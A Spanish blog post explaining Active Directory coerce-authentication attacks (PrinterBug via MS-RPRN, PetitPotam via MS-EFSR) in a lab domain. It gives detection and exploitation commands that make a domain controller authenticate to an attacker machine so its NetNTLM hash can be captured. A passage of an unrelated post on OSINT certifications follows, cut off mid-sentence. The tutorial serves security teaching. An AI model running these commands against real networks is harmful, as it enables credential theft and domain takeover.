href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjacCq5tXa4GUbYfYfn2-bXr-g_Q74lrNQnVMfQQG9SHuBHJ_Qu2tSW5jN7Lk1hwoEVkMWLqOIHvKn48r-MeMarbrxnft6zmQjdNua8_8zb0rxw6XQ-glbLr16V4Mvi541hzodro4GGoJMA2UgxFpk-7Ths2ENp_bNTQmPe4rK1gp6OLI6u3W03ydvmF1Nx/s1920/El%20texto%20del%20p%C3%A1rrafo.jpg" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjacCq5tXa4GUbYfYfn2-bXr-g_Q74lrNQnVMfQQG9SHuBHJ_Qu2tSW5jN7Lk1hwoEVkMWLqOIHvKn48r-MeMarbrxnft6zmQjdNua8_8zb0rxw6XQ-glbLr16V4Mvi541hzodro4GGoJMA2UgxFpk-7Ths2ENp_bNTQmPe4rK1gp6OLI6u3W03ydvmF1Nx/w640-h360/El%20texto%20del%20p%C3%A1rrafo.jpg" width="640" /></a></span></div><div class="separator" style="clear: both; text-align: center;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Dentro del entorno de Active Directory, los atacantes recurren a autenticaciones forzadas y estrategias de MitM para llevar a cabo diversas acciones. Es por ello por lo que, en esta ocasión, entraremos en el tema de Coerce Authentication. A lo largo de diferentes posts explicaremos las diferentes formas de realizar esta técnica, además de como enlazarlo con otros ataques para elevar privilegios en un dominio.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">“Coerce authentication” es una técnica que, mediante las llamadas a los Remote Procedure Calls (RPC) de Windows, fuerza a un servicio a que se autentique contra una máquina. Mediante esta técnica, un atacante puede forzar a servidor vulnerable a autenticarse contra una máquina controlada por el atacante y de esta forma, llegar a obtener el hash de la contraseña de la cuenta de máquina en formato NetNTLM.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una cuenta de máquina en redes Windows se refiere a una identidad única asociada a un dispositivo en la red. Las cuentas de máquina son esenciales para establecer la comunicación y la colaboración entre dispositivos dentro de un entorno de red con sistemas operativos Windows.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Una vez obtenido el hash de la cuenta de una máquina, se abren un abanico de posibles técnicas para poder aprovechar esta autenticación para suplantar a la víctima. Parte de la criticidad de esta técnica, radica en que una máquina es la víctima. Por ejemplo, si esta técnica es utilizada contra un controlador de dominio, es posible llegar a comprometer la totalidad del dominio, elevando así la criticidad de dicha técnica.</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">¿Qué es RPC?</span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">RPC son las siglas de Remote Procedure Call (Llamada a Procedimiento Remoto) la cual, es una forma de comunicación entre procesos (IPC). Esta tecnología permite a las aplicaciones enviarse señales entre sí para realizar una operación.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En los entornos Windows, se hace un uso intensivo de RPC para muchos servicios diferentes, como la programación de tareas, la creación de servicios, la configuración de impresoras, configuración de recursos compartidos, la gestión de datos cifrados almacenados de forma remota, entre otros…</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Debido a la naturaleza de RPC como vector remoto, atrae mucha atención desde el punto de vista de la seguridad informática.</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Principales RPC Vulnerables </span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">A continuación, se procede a enumerar los principales RPC vulnerables conocidos para el uso de la técnica “Coerce Authentication”.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que, para la explotación de dichos RPC, es necesario tener una cuenta de un usuario del domino valida, aunque en el caso del RPC conocido como MS-EFSR, es posible llegar a ejecutarlo sin un usuario.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para este segundo caso, donde la explotación era de forma anónima, Microsoft sí que ha considerado esto una vulnerabilidad y ha sacado parches de seguridad para su corrección.</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">MS-RPRN</span></h3><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1">MS-RPRN</a> es el Remote Procedure Call relacionado con el protocolo de sistema de impresión remoto. </span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Print Spooler de Microsoft es un servicio que gestiona los trabajos de impresión y otras tareas relacionadas con la impresión. Un atacante que controle un usuario/ordenador de dominio puede, con una llamada RPC específica, activar el servicio spooler de un objetivo que lo esté ejecutando y hacer que se autentique en un objetivo elegido por el atacante. Este comportamiento está marcado como “Wont Fix” desde Microsoft y está habilitado por defecto en todos los entornos Windows.</span></p><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comprobación</span></h4><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para comprobar si un RPC está habilitado en el equipo de la víctima, se puede hacer uso de la herramienta <a href="https://github.com/fortra/impacket/blob/master/examples/rpcdump.py">rpcdump</a> de <a href="https://github.com/fortra/impacket">impacket</a>:</span></p><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comando: python3 rpcdump.py @dc.corp.lab | grep ‘MS-RPRN’</span></div></blockquote><p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCjwChjjZmjn11ea1CjWDF_FV0xhuiuas814MpCYKf41xyQCCmf4HGeTRpng5Mwpg0nZ5mWVYxpTMVtgo7PGa8kfYj1JzMzZPl9xOOj9ZKZYLFT_ZwBVxVdg8FjQQkpUEawAe08_k2vJjaYmFuFNedqKNibECeuG25l-FNlce_OMjxqGKWuUBYpSrj7zcG/s429/0.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="44" data-original-width="429" height="66" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCjwChjjZmjn11ea1CjWDF_FV0xhuiuas814MpCYKf41xyQCCmf4HGeTRpng5Mwpg0nZ5mWVYxpTMVtgo7PGa8kfYj1JzMzZPl9xOOj9ZKZYLFT_ZwBVxVdg8FjQQkpUEawAe08_k2vJjaYmFuFNedqKNibECeuG25l-FNlce_OMjxqGKWuUBYpSrj7zcG/w640-h66/0.png" width="640" /></a></div><br /><p></p><div style="text-align: justify;"><div class="separator" style="clear: both; text-align: center;"><br /></div></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Explotación</span></h4><div><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tras comprobar que el RPC denominado como “MS-RPRN” está habilitado en la víctima, además de haber comprometido un usuario del dominio mediante otras vías, se procederá a la explotación del mismo mediante una PoC denominada como Printer Bug o SpoolSample la cual tiene asignada el identificador CVE-2021-34527. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Así mismo, para comprobar que se fuerza la autenticación correctamente, haremos uso del usuario “bob” con privilegios limitados en el dominio “dc.corp.lab”.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comando: python3 printerbug.py “CORP/bob:<password> @dc.corp.lab” attack_machine</span></div></div></blockquote><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQALyrUcoe1nGk3jMUEoWjA7B3cHueRR2Wmo5rawUiaRWFomtWg1ZfAKGXThvFMy021fVcN0EZ04UGs89fUdfaCAQMAwAlSqJ5GQO94cGZBSSwg9mxjtraNBkoqRilAhc_4q8zq6W6M3SrQhonEFqrFai8TFocUSSKW0KcL0J6TAE4eEpyFgDukqX3CHnt/s730/1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Ilustración 2 – Explotación satisfactoria de printerbug." border="0" data-original-height="138" data-original-width="730" height="120" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQALyrUcoe1nGk3jMUEoWjA7B3cHueRR2Wmo5rawUiaRWFomtWg1ZfAKGXThvFMy021fVcN0EZ04UGs89fUdfaCAQMAwAlSqJ5GQO94cGZBSSwg9mxjtraNBkoqRilAhc_4q8zq6W6M3SrQhonEFqrFai8TFocUSSKW0KcL0J6TAE4eEpyFgDukqX3CHnt/w640-h120/1.png" title="Ilustración 2 – Explotación satisfactoria de printerbug." width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tras la explotación de la vulnerabilidad, se ha obtenido el hash netNTLMv2 de la cuenta de máquina del controlador de dominio. </span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQQFAbPSobeva6EpjDk_hg2MWJlejTRDUdLsjkUMdciX2tSwWe8KcVX5MnZPJGWu-4UqrL139N0ICFsbceZrlQxFxf1vqzDiCRh8ENfR4Y0g2Ga9eIkndsjxWRFRAGK39FYhjZwu62VckMlwrLQpDykj4DOX9QmSlBKQe1xp0eC5JFwCs7Rz4P547GNNbV/s931/2.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Ilustración 3 – Obtención hash NetNTLM." border="0" data-original-height="150" data-original-width="931" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQQFAbPSobeva6EpjDk_hg2MWJlejTRDUdLsjkUMdciX2tSwWe8KcVX5MnZPJGWu-4UqrL139N0ICFsbceZrlQxFxf1vqzDiCRh8ENfR4Y0g2Ga9eIkndsjxWRFRAGK39FYhjZwu62VckMlwrLQpDykj4DOX9QmSlBKQe1xp0eC5JFwCs7Rz4P547GNNbV/w640-h104/2.png" title="Ilustración 3 – Obtención hash NetNTLM." width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h3 style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">MS-EFSR</span></h3><div><span style="font-family: "Barlow Semi Condensed";"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31">MS-EFSR</a> es el Remote Procedure Call relacionado con el protocolo de sistema de cifrado de ficheros remoto. Realiza operaciones de mantenimiento y gestión de datos cifrados que se almacenan de forma remota y a los que se accede a través de una red y está disponible como interfaz RPC.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que originalmente este RPC era explotable de forma anónima, sin necesidad de haber comprometido previamente una cuenta de usuario del dominio. Es por ello por lo que Microsoft sacó dos parches de seguridad, tanto el 10 de agosto de 2021, como el 10 de mayo de 2022, los cuales se encargan de arreglar la posibilidad de poder realizar esta técnica sin un usuario del dominio.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comprobación</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En este caso, haremos uso de la herramienta <a href="https://github.com/byt3bl33d3r/CrackMapExec">crackmapexec</a>, actualmente conocida como <a href="https://github.com/Pennyw0rth/NetExec">netexec</a>, a través de la ejecución del módulo “petitpotam”, para la comprobación de forma anónima de si el servidor es o no vulnerable:</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comando: crackmapexec smb dc.corp.lab -M petitpotam</span></div></div></blockquote><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgbuAO4rpKSDrE45JecEdewyUq8zzFo66XIGJJIwCTjiGdJY-ZJS-2reCE2via1O-A0sVJEP_QMGRMLdQbZvt-uwurEv6eIiqPl__N2iZV3bm5I_cTTsm5_-6MFcvGadJSxdCbGWtCg7xxeTpHG2UikPNa9DA9YAnshZYlF_Q6W4RQNfwZuC9ZZvkI6rIfk" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Ilustración 4 – Domain Controler vulnerable." data-original-height="60" data-original-width="890" height="44" src="https://blogger.googleusercontent.com/img/a/AVvXsEgbuAO4rpKSDrE45JecEdewyUq8zzFo66XIGJJIwCTjiGdJY-ZJS-2reCE2via1O-A0sVJEP_QMGRMLdQbZvt-uwurEv6eIiqPl__N2iZV3bm5I_cTTsm5_-6MFcvGadJSxdCbGWtCg7xxeTpHG2UikPNa9DA9YAnshZYlF_Q6W4RQNfwZuC9ZZvkI6rIfk=w640-h44" title="Ilustración 4 – Domain Controler vulnerable." width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Cabe destacar que existen más métodos para comprobar si dicho RPC está habilitado mediante otras herramientas y técnicas.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Explotación</span></h4><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Tras comprobar que el controlador de dominio es vulnerable de forma anónima, se procederá a la explotación de del mismo mediante una PoC denominada como <a href="https://github.com/topotam/PetitPotam">Petit Potam</a> la cual tiene asignada dos identificadores <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942">CVE-2021-36942</a> y <a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2022-26925">CVE-2022-26925</a>.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Para comprobar que se fuerza la autenticación de forma anónima, ejecutaremos la PoC dejando los parámetros de usuario (-u), contraseña (-p) y dominio (-d) vacíos.</span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div></div><blockquote style="border: none; margin: 0px 0px 0px 40px; padding: 0px;"><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Comando: python3 PetitPotam.py -u “” -p “” -d “” attack_machine dc.corp.lab</span></div></div></blockquote><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCC42JuIRpRaPhlSpDFZ14xPPON4N73fAOD3Tev-aaiqrwu-oqV4d7IXy7lCCTA14TRMTRRkN2MxKvwgimrLdJWEGKOPtGyCzEEYkpgx5ZeLi6VNgpw6OqQFzy7EgZn5nv-zUHuBxpevO9q_Dja71g59hR_0_72Bb8cHfe4Ps5jR26aZX0wE_SjWw5oFaG/s736/1.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Ilustración 5 – Explotación satisfactoria de PetitPotam." border="0" data-original-height="456" data-original-width="736" height="396" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCC42JuIRpRaPhlSpDFZ14xPPON4N73fAOD3Tev-aaiqrwu-oqV4d7IXy7lCCTA14TRMTRRkN2MxKvwgimrLdJWEGKOPtGyCzEEYkpgx5ZeLi6VNgpw6OqQFzy7EgZn5nv-zUHuBxpevO9q_Dja71g59hR_0_72Bb8cHfe4Ps5jR26aZX0wE_SjWw5oFaG/w640-h396/1.png" title="Ilustración 5 – Explotación satisfactoria de PetitPotam." width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><span style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Se puede observar la captura del hash NetNTLM en la herramienta Responder.</span></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid3rN4xqkOtnrQb06cOYYL501mCjYXCdc4F3WNKRIpBMkSIwNuKviF9LatNIrK5nbGADPuvYdliYE_6DM-b_xsXpNlaqJHvcJytf2lbEAhxTYygB91kt6ZhOVlmNYYWzPoMlg8qCMJcCJH5QkdlUQOTAPtO4cSM6Xd560xamKYZadMbl_xfRQZi6VdBCpJ/s938/2.png" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img alt="Ilustración 7 – Obtención hash NetNTLM." border="0" data-original-height="147" data-original-width="938" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid3rN4xqkOtnrQb06cOYYL501mCjYXCdc4F3WNKRIpBMkSIwNuKviF9LatNIrK5nbGADPuvYdliYE_6DM-b_xsXpNlaqJHvcJytf2lbEAhxTYygB91kt6ZhOVlmNYYWzPoMlg8qCMJcCJH5QkdlUQOTAPtO4cSM6Xd560xamKYZadMbl_xfRQZi6VdBCpJ/w640-h100/2.png" title="Ilustración 7 – Obtención hash NetNTLM." width="640" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">En futuras entregas continuaremos hablando de <b>otros RPC vulnerables</b>, ¡Hasta la próxima! ¡Agur!</span></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: right;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.linkedin.com/in/dimas-pastor/">Dimas Pastor</a>, Senior Analyst en <a href="http://www.zerolynx.com" target="_blank">Grupo Zerolynx</a>.</span></div>Celia Catalánhttp://www.blogger.com/profile/17028922234459073806noreply@blogger.com0Madrid, España40.4167754 -3.703790212.106541563821153 -38.8600402 68.727009236178844 31.4524598tag:blogger.com,1999:blog-7938680518783212855.post-13892975194002335522024-01-29T19:00:00.003+01:002024-01-29T19:00:27.620+01:00Certificaciones de Ciberinteligencia<p> </p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaSwXThjDmsZwkLvKkwPAzwrKWEQZWl7Gje1Vk8XHz60yqUWLd0wlHMEE5xu2wkvnY_g9-x2O5e8gJLw0yXpTY8XmalJZUx-Wgl5PQANa0LbQTHN8laRLjNmFTSKhylGbuZsbh_yfYQRiZQpeErKDrCXcRxeuhXLiXj0Ke0ZbWU49_EzHOMzz_WceHaP21/s1920/CERTIFICACIONES%20DE%20CIBERINTELIGENCIA.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1080" data-original-width="1920" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaSwXThjDmsZwkLvKkwPAzwrKWEQZWl7Gje1Vk8XHz60yqUWLd0wlHMEE5xu2wkvnY_g9-x2O5e8gJLw0yXpTY8XmalJZUx-Wgl5PQANa0LbQTHN8laRLjNmFTSKhylGbuZsbh_yfYQRiZQpeErKDrCXcRxeuhXLiXj0Ke0ZbWU49_EzHOMzz_WceHaP21/w640-h360/CERTIFICACIONES%20DE%20CIBERINTELIGENCIA.jpg" width="640" /></a></div><br /><p></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El concepto de inteligencia se ha ligado a numerosos ámbitos a lo largo de los años nombrando así nuevas áreas de conocimiento sobre temáticas muy variadas: psicología (inteligencia emocional), matemáticas (inteligencia de datos) o comercio (inteligencia de negocio), entre muchos otros. Este fenómeno estaría, en todo caso, determinado por la esencia de la palabra inteligencia en sí, y en concreto por su significado. Inteligencia supone la capacidad de entender, de resolver problemas, conocer y comprender.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">El afán de conocimiento del ser humano se ha ido, por tanto, expandiendo a todos los campos del saber existentes y por existir. Este movimiento en pro del saber cabe destacar que no es una novedad y que concretamente los estados de la era modera pueden condecorarse como los primeros en establecer una serie de directrices y estándares en cuanto a su aprendizaje, aplicación y aprovechamiento. Siendo por ello, los servicios de inteligencia uno de los mejores ejemplos a seguir para la obtención de información y generación de inteligencia para las organizaciones.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las metodologías y estructuras analíticas también se han ido desarrollando por parte de la sociedad civil en la empresa privada. Los servicios que ofrecen las empresas particularmente de ciberinteligencia, se basan en una esfera de conocimiento muy concreta, que contienen dentro una mucho mayor, la inteligencia.</span></p><p style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La acreditación para los profesionales del sector de la ciberinteligencia supone por un lado la adquisición de conocimientos necesarios para la realización de su labor diaria y por otro el reconocimiento por parte de una institución privada de que ciertamente se poseen dichos conocimientos. En el sector, el conocimiento necesario para realizar los servicios dependerá del área particular sobre la que se trabaje, sin embargo, consideramos actualmente como algunas de las certificaciones más relevantes:</span></p><h3 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Certificaciones relativas a metodologías de obtención, OSINT (Open Source Intelligence)</span></h3><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitpotmlGM8sBQ4NTUdadqwWRkieYSwzXBrRi2VYOsGJ98w0d1c63TcX59TuwiaH73Hco1qIhCRV6ouP_a7PZgntbXQNekHj2hrTKXCG1SP4tnw_XS77Cj5cs5tjUwAu77FgCcq7pw4mK_UelLQqa5_i86tfXcFTb5uE8WBgfyso1APpYnkuvaLXjs2eTfG/s409/OSINT%20Expert%20Certified.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="388" data-original-width="409" height="190" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitpotmlGM8sBQ4NTUdadqwWRkieYSwzXBrRi2VYOsGJ98w0d1c63TcX59TuwiaH73Hco1qIhCRV6ouP_a7PZgntbXQNekHj2hrTKXCG1SP4tnw_XS77Cj5cs5tjUwAu77FgCcq7pw4mK_UelLQqa5_i86tfXcFTb5uE8WBgfyso1APpYnkuvaLXjs2eTfG/w200-h190/OSINT%20Expert%20Certified.png" width="200" /></span></a></div><div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.mosse-institute.com/certifications/mois-certified-osint-expert.html">Certified OSINT Expert (MOIS), Mossé Cyber Security Institute</a></span></h4><div style="text-align: left;"><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Principiante</span></li><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Precio: 450$</span></li><li style="text-align: justify;"><span style="font-family: "Barlow Semi Condensed";">Renovación: No requerida</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La obtención de la certificación se realiza completando el 100% de los ejercicios que se presentan en los módulos. Estos módulos prácticos están separados por temáticas relacionadas con activos, redes sociales, filtraciones y entregables entre otros. No cuenta con límite de tiempo para su realización.</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDYx3asCcVchxWU2QbdO4isIibRoGKnX1ILIoedW1g-3a_uuh9a3k8yz-m7iev8Sv7WEq4IcWy872Nmdr-pvh574zAUP1WvlByOCKegFA-Fw2v-0dezm2Ii4fsESPJjMD2VtBLoKMajEV_QbgW4M2xiJM1x1tMASqWo4ruh3Yu7G3D_bouHxWEWT_7vqZg/s171/Open%20Source%20Inteligence.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="171" data-original-width="170" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDYx3asCcVchxWU2QbdO4isIibRoGKnX1ILIoedW1g-3a_uuh9a3k8yz-m7iev8Sv7WEq4IcWy872Nmdr-pvh574zAUP1WvlByOCKegFA-Fw2v-0dezm2Ii4fsESPJjMD2VtBLoKMajEV_QbgW4M2xiJM1x1tMASqWo4ruh3Yu7G3D_bouHxWEWT_7vqZg/w199-h200/Open%20Source%20Inteligence.png" width="199" /></span></a></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://www.mcafeeinstitute.com/products/certified-osint">Certified in Open Source Intelligence (C|OSINT), McAfee</a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Intermedio</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 450$</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: Cada 2 años, 125$</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Las certificaciones de McAfee son accesibles acreditando educación superior o experiencia laboral en diversas áreas relacionadas con la obtención de información sin necesidad de realizar su training. Aunque en todas las certificaciones existen paquetes en las que se incluye la formación, un manual de estudio, ejercicios de preparación y el acceso al examen. Hay numerosas certificaciones relacionadas con cibertinteligencia, y puede que en algunas de ellas el temario sea similar. La certificación se obtiene obteniendo un 70% o más en el examen.</span></div><div style="text-align: justify;"><br /></div></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHIxDQaLRBUUAYqudsLf8YaYkTk5F-aNXFe5SYuW5_0smGfy8KEDixbMIYuY2F8_bULYCUzDxDds81Lf76M9A6RlC1kkpVdBOLMJHU9KVclWHA-FPVi4zCkr-0XbMCwgKx2cRtRXMMueDSUEro5N_13r6matb95hB35BJmF3p_HuVl2_zdfhBKkmPjezt/s167/OSIP.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: Barlow Semi Condensed;"><img border="0" data-original-height="167" data-original-width="167" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcHIxDQaLRBUUAYqudsLf8YaYkTk5F-aNXFe5SYuW5_0smGfy8KEDixbMIYuY2F8_bULYCUzDxDds81Lf76M9A6RlC1kkpVdBOLMJHU9KVclWHA-FPVi4zCkr-0XbMCwgKx2cRtRXMMueDSUEro5N_13r6matb95hB35BJmF3p_HuVl2_zdfhBKkmPjezt/w200-h200/OSIP.png" width="200" /></span></a></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><div class="separator" style="clear: both; text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><br /></span></div><h4 style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;"><a href="https://inteltechniques.com/training-osip.html">Open Source Intelligence Professional (OSIP), Inteltechniques</a></span></h4><div><ul style="text-align: left;"><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Nivel: Avanzado</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Precio: 300$</span></li><li style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">Renovación: No requerida</span></li></ul></div><div style="text-align: justify;"><span style="font-family: Barlow Semi Condensed;">La certificación requiere bien la realización del training, la acreditación de experiencia profesional en dicho campo. La practicidad de esta certificación puede suponer un reto para aquellos que no trabajen a diario con obtención en fuentes abiertas o no tengan experiencia previa. El examen de certificación se basa en la realización de una investigación con su entregable, con duración de máximo 10 días sobre un caso que propone un supuesto cliente. La evaluación se realizará sobre el entregable, esperándose de este un nivel profesional en cuanto a formato y contenido que podría ser 